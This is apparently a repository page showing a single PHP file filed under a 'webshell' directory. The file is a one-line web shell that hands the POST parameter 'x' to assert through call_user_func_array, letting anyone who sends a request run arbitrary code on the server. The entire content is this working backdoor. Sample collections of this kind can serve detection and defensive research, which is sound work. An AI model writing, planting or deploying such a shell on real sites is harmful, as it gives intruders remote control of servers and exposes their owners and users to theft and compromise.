webshell/php/2020.08.20.08.php

4 lines
62 B
PHP
Raw Permalink Normal View History

<?php
call_user_func_array(assert,array($_POST['x']));
?>